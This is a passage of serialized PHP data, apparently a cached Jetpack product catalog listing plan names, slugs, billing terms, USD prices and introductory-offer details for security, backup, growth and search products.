(10GB)\";s:12:\"product_slug\";s:26:\"jetpack_security_t1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$239.40\";s:21:\"combined_cost_display\";s:7:\"$239.40\";s:4:\"cost\";d:239.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:23940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:119.400000000000005684341886080801486968994140625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";O:8:\"stdClass\":2:{s:6:\"errors\";O:8:\"stdClass\":1:{s:45:\"introductory-offer-removed-subscription-found\";a:1:{i:0;s:141:\"Unable to apply introductory offer to Jetpack Security (10GB) because a subscription for this product has already been purchased in the past.\";}}s:10:\"error_data\";a:0:{}}}s:22:\"cost_per_month_display\";s:6:\"$19.95\";}s:27:\"jetpack_security_t1_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2017;s:12:\"product_name\";s:23:\"Jetpack Security (10GB)\";s:12:\"product_slug\";s:27:\"jetpack_security_t1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:26:\"jetpack_security_t2_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2019;s:12:\"product_name\";s:22:\"Jetpack Security (1TB)\";s:12:\"product_slug\";s:26:\"jetpack_security_t2_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$899.40\";s:21:\"combined_cost_display\";s:7:\"$899.40\";s:4:\"cost\";d:899.3999999999999772626324556767940521240234375;s:18:\"cost_smallest_unit\";i:89940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:359.3999999999999772626324556767940521240234375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$74.95\";}s:27:\"jetpack_security_t2_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2020;s:12:\"product_name\";s:22:\"Jetpack Security (1TB)\";s:12:\"product_slug\";s:27:\"jetpack_security_t2_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$74.95\";s:21:\"combined_cost_display\";s:6:\"$74.95\";s:4:\"cost\";d:74.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:7495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:22:\"jetpack_growth_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2021;s:12:\"product_name\";s:14:\"Jetpack Growth\";s:12:\"product_slug\";s:22:\"jetpack_growth_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-growth\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:21:\"jetpack_growth_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2022;s:12:\"product_name\";s:14:\"Jetpack Growth\";s:12:\"product_slug\";s:21:\"jetpack_growth_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-growth\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$239.40\";s:21:\"combined_cost_display\";s:7:\"$239.40\";s:4:\"cost\";d:239.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:23940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:119.400000000000005684341886080801486968994140625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$19.95\";}s:24:\"jetpack_growth_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2023;s:12:\"product_name\";s:14:\"Jetpack Growth\";s:12:\"product_slug\";s:24:\"jetpack_growth_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-growth\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$383.04\";s:21:\"combined_cost_display\";s:7:\"$383.04\";s:4:\"cost\";d:383.04000000000002046363078989088535308837890625;s:18:\"cost_smallest_unit\";i:38304;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:287.04000000000002046363078989088535308837890625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$15.96\";}s:22:\"jetpack_starter_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2030;s:12:\"product_name\";s:15:\"Jetpack Starter\";s:12:\"product_slug\";s:22:\"jetpack_starter_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:0;s:20:\"billing_product_slug\";s:15:\"jetpack-starter\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$71.40\";s:21:\"combined_cost_display\";s:6:\"$71.40\";s:4:\"cost\";d:71.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:7140;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:47.39999999999999857891452847979962825775146484375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$5.95\";}s:23:\"jetpack_starter_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2031;s:12:\"product_name\";s:15:\"Jetpack Starter\";s:12:\"product_slug\";s:23:\"jetpack_starter_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:0;s:20:\"billing_product_slug\";s:15:\"jetpack-starter\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$8.95\";s:21:\"combined_cost_display\";s:5:\"$8.95\";s:4:\"cost\";d:8.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:895;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:29:\"jetpack_security_t1_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2034;s:12:\"product_name\";s:23:\"Jetpack Security (10GB)\";s:12:\"product_slug\";s:29:\"jetpack_security_t1_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$383.04\";s:21:\"combined_cost_display\";s:7:\"$383.04\";s:4:\"cost\";d:383.04000000000002046363078989088535308837890625;s:18:\"cost_smallest_unit\";i:38304;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:287.04000000000002046363078989088535308837890625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$15.96\";}s:26:\"jetpack_complete_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2035;s:12:\"product_name\";s:16:\"Jetpack Complete\";s:12:\"product_slug\";s:26:\"jetpack_complete_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-complete\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$959.04\";s:21:\"combined_cost_display\";s:7:\"$959.04\";s:4:\"cost\";d:959.0399999999999636202119290828704833984375;s:18:\"cost_smallest_unit\";i:95904;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:719.0399999999999636202119290828704833984375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$39.96\";}s:23:\"jetpack_boost_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2036;s:12:\"product_name\";s:13:\"Jetpack Boost\";s:12:\"product_slug\";s:23:\"jetpack_boost_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:13:\"jetpack-boost\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$383.04\";s:21:\"combined_cost_display\";s:7:\"$383.04\";s:4:\"cost\";d:383.04000000000002046363078989088535308837890625;s:18:\"cost_smallest_unit\";i:38304;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:287.04000000000002046363078989088535308837890625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$15.96\";}s:30:\"jetpack_social_basic_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2037;s:12:\"product_name\";s:20:\"Jetpack Social Basic\";s:12:\"product_slug\";s:30:\"jetpack_social_basic_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"jetpack-social-basic-yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$238.80\";s:21:\"combined_cost_display\";s:7:\"$238.80\";s:4:\"cost\";d:238.80000000000001136868377216160297393798828125;s:18:\"cost_smallest_unit\";i:23880;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.05000000000001136868377216160297393798828125;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:22:\"jetpack_scan_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2038;s:12:\"product_name\";s:18:\"Jetpack Scan Daily\";s:12:\"product_slug\";s:22:\"jetpack_scan_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-scan\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$191.04\";s:21:\"combined_cost_display\";s:7:\"$191.04\";s:4:\"cost\";d:191.039999999999992041921359486877918243408203125;s:18:\"cost_smallest_unit\";i:19104;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.039999999999992041921359486877918243408203125;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$7.96\";}s:27:\"jetpack_anti_spam_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2039;s:12:\"product_name\";s:25:\"Jetpack Akismet Anti-spam\";s:12:\"product_slug\";s:27:\"jetpack_anti_spam_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-anti-spam\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$191.04\";s:21:\"combined_cost_display\";s:7:\"$191.04\";s:4:\"cost\";d:191.039999999999992041921359486877918243408203125;s:18:\"cost_smallest_unit\";i:19104;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.039999999999992041921359486877918243408203125;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$7.96\";}s:41:\"jetpack_backup_addon_storage_10gb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2040;s:12:\"product_name\";s:47:\"Jetpack VaultPress Backup Add-on Storage (10GB)\";s:12:\"product_slug\";s:41:\"jetpack_backup_addon_storage_10gb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:33:\"jetpack-backup-addon-storage-10gb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$2.95\";s:21:\"combined_cost_display\";s:5:\"$2.95\";s:4:\"cost\";d:2.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:295;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:42:\"jetpack_backup_addon_storage_100gb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2044;s:12:\"product_name\";s:48:\"Jetpack VaultPress Backup Add-on Storage (100GB)\";s:12:\"product_slug\";s:42:\"jetpack_backup_addon_storage_100gb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:34:\"jetpack-backup-addon-storage-100gb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$5.95\";s:21:\"combined_cost_display\";s:5:\"$5.95\";s:4:\"cost\";d:5.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:595;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:40:\"jetpack_backup_addon_storage_1tb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2048;s:12:\"product_name\";s:46:\"Jetpack VaultPress Backup Add-on Storage (1TB)\";s:12:\"product_slug\";s:40:\"jetpack_backup_addon_storage_1tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:32:\"jetpack-backup-addon-storage-1tb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.95\";s:21:\"combined_cost_display\";s:5:\"$9.95\";s:4:\"cost\";d:9.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:40:\"jetpack_backup_addon_storage_3tb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2052;s:12:\"product_name\";s:46:\"Jetpack VaultPress Backup Add-on Storage (3TB)\";s:12:\"product_slug\";s:40:\"jetpack_backup_addon_storage_3tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:32:\"jetpack-backup-addon-storage-3tb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$19.95\";s:21:\"combined_cost_display\";s:6:\"$19.95\";s:4:\"cost\";d:19.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:40:\"jetpack_backup_addon_storage_5tb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2056;s:12:\"product_name\";s:46:\"Jetpack VaultPress Backup Add-on Storage (5TB)\";s:12:\"product_slug\";s:40:\"jetpack_backup_addon_storage_5tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:32:\"jetpack-backup-addon-storage-5tb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:20:\"jetpack_backup_daily\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2100;s:12:\"product_name\";s:22:\"Jetpack Backup (Daily)\";s:12:\"product_slug\";s:20:\"jetpack_backup_daily\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:20:\"jetpack-backup-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.00\";s:21:\"combined_cost_display\";s:4:\"$119\";s:4:\"cost\";i:119;s:18:\"cost_smallest_unit\";i:11900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:59;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.92\";}s:28:\"jetpack_backup_daily_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2101;s:12:\"product_name\";s:22:\"Jetpack Backup (Daily)\";s:12:\"product_slug\";s:28:\"jetpack_backup_daily_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:20:\"jetpack-backup-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.95\";s:21:\"combined_cost_display\";s:5:\"$9.95\";s:4:\"cost\";d:9.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:23:\"jetpack_backup_realtime\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2102;s:12:\"product_name\";s:26:\"Jetpack Backup (Real-time)\";s:12:\"product_slug\";s:23:\"jetpack_backup_realtime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-backup-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$599.00\";s:21:\"combined_cost_display\";s:4:\"$599\";s:4:\"cost\";i:599;s:18:\"cost_smallest_unit\";i:59900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:299;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$49.92\";}s:31:\"jetpack_backup_realtime_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2103;s:12:\"product_name\";s:26:\"Jetpack Backup (Real-time)\";s:12:\"product_slug\";s:31:\"jetpack_backup_realtime_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-backup-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$49.95\";s:21:\"combined_cost_display\";s:6:\"$49.95\";s:4:\"cost\";d:49.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:4995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:14:\"jetpack_search\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2104;s:12:\"product_name\";s:14:\"Jetpack Search\";s:12:\"product_slug\";s:14:\"jetpack_search\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"search\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-search\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$100.00\";s:21:\"combined_cost_display\";s:4:\"$100\";s:4:\"cost\";i:100;s:18:\"cost_smallest_unit\";i:10000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:1:{i:0;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:0;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:10000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:0;s:12:\"per_unit_fee\";i:10000;s:21:\"minimum_price_display\";s:2:\"$0\";s:29:\"minimum_price_monthly_display\";s:2:\"$0\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:560;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$8.33\";}s:22:\"jetpack_search_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2105;s:12:\"product_name\";s:14:\"Jetpack 